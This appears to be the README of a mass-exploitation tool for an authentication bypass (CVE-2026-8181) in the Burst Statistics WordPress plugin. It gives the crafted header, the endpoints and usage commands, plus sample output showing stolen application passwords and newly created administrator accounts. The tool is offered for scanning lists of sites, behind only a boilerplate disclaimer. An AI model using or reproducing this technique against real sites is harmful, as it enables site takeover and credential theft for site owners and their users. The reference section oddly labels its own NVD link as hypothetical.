Share
## https://sploitus.com/exploit?id=5081559F-E6D2-527C-B430-4E0399FF4B5D
# CVE-2026-8181 - Burst Statistics Authentication Bypass Exploit

**Python 2.7** exploit for the Burst Statistics plugin vulnerability (CVE-2026-8181) that allows unauthenticated attackers to bypass REST API authentication, retrieve application passwords, and create new administrator users on vulnerable WordPress sites.

> โš ๏ธ **Disclaimer**  
> This tool is for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal. Use only on websites you own or have explicit permission to test.
> More Disclaimer You Can see the disclaimer on the cover of Jenderal92. You can check it [HERE !!!](https://github.com/Jenderal92/
## Vulnerability Overview

CVE-2026-8181 affects the Burst Statistics plugin for WordPress (versions prior to the patch). The flaw resides in the REST API authentication mechanism, allowing an attacker to:

- Bypass authentication by sending a crafted `X-BURSTMAINWP` header
- Retrieve application passwords via the `/burst/v1/mainwp-auth` endpoint
- Perform privileged actions (list users, read settings, create new admin accounts) through the WordPress REST API

## Features

- Multi-threaded scanning (default 10 threads)
- Automatic detection of WordPress base paths (`/`, `/wordpress`, `/wp`)
- Username enumeration via `/wp-json/wp/v2/users` or author ID redirects
- Exploitation of the auth bypass to:
  - Obtain application passwords (Base64 encoded token)
  - Verify access to sensitive REST endpoints (settings, plugins, admin users)
  - Create a new administrator user with random credentials
- Saves successful results to `res.txt`

## Requirements

- **Python 2.7** (deprecated but required by the script)
- `requests` library

```bash
pip install requests
```

## Usage

1. Prepare a target list file (one domain or IP per line, with or without `http://`/`https://`).

   Example `targets.txt`:
   ```
   example.com
   https://vulnerable-site.com
   127.0.0.1/wordpress
   ```

2. Run the exploit:

```bash
python2 CVE-2026-8181.py targets.txt
```

3. Results are saved to `res.txt` in the current directory.

### Command Line Options

| Argument     | Description                          |
|--------------|--------------------------------------|
| `list.txt`   | Path to file containing target URLs  |

### Example Output

```
============================================================
CVE-2026-8181 - Burst Statistics Auth Bypass Exploit
============================================================
[*] Total targets: 2
[*] Threads: 10
[*] Base paths: ['', '/wordpress', '/wp']

[*] Scanning: example.com
    Trying path: /
    Detected username: admin
    [+] VULNERABLE! REST API bypass successful
    [+] Application Password obtained!
    [+]   Username: admin
    [+]   App Password: xxxx xxxx xxxx
    [+]   Base64 Token: YWRtaW46eHh4eA==
    [+] Access confirmed: WordPress settings
    [+] Access confirmed: Installed plugins
    [+] Access confirmed: Admin users
    [+] Admin user created via REST API: wp_abc123
    [+] Results saved to res.txt
```

## Output File Format (`res.txt`)

For each vulnerable target, the script appends:

```
============================================================
Target: http://example.com
============================================================

[+] Access Verification:
    [+] WordPress settings
    [+] Installed plugins
    [+] Admin users

[+] REST API Credentials:
    Username: wp_abc123
    Password: random12char
    Note: Use with X-BURSTMAINWP header

[+] Application Password:
    Username: admin
    App Password: xxxx xxxx xxxx
    Base64 Token: YWRtaW46eHh4eA==
```

## How It Works

1. **Target preparation** โ€“ Adds `http://` prefix if missing, strips trailing slashes.
2. **Path iteration** โ€“ Tries `/`, `/wordpress`, and `/wp` as WordPress base directories.
3. **Username enumeration** โ€“ Fetches `/wp-json/wp/v2/users` or uses `?author=N` redirects.
4. **Bypass test** โ€“ Sends `X-BURSTMAINWP: 1` + Basic auth with username and dummy password (`CVE-2026-8181`). If endpoint `/wp-json/wp/v2/users/me?context=edit` returns 200, the site is vulnerable.
5. **Exploitation** โ€“  
   - Requests `/wp-json/burst/v1/mainwp-auth` to retrieve an application password token.  
   - Verifies access to `/settings`, `/plugins`, `/users`.  
   - Creates a new administrator account via `POST /wp-json/wp/v2/users`.
6. **Result saving** โ€“ Writes all obtained credentials to `res.txt`.

## Customisation

You can modify these variables inside the script:

- `THREADS` โ€“ Number of concurrent threads (default 10)
- `BASE_PATHS` โ€“ Additional WordPress subdirectories to check
- `requests` timeout values

## Notes

- The script uses Python 2.7 โ€“ ensure it is installed or consider porting to Python 3.
- SSL certificate verification is disabled (`verify=False`) for simplicity.
- The exploit depends on the Burst Statistics plugin being active and unpatched.

## License

This project is provided for educational purposes only. Use at your own risk.

## References

- [CVE-2026-8181 Detail](https://nvd.nist.gov/vuln/detail/CVE-2026-8181) (hypothetical)
- Burst Statistics plugin (affected versions)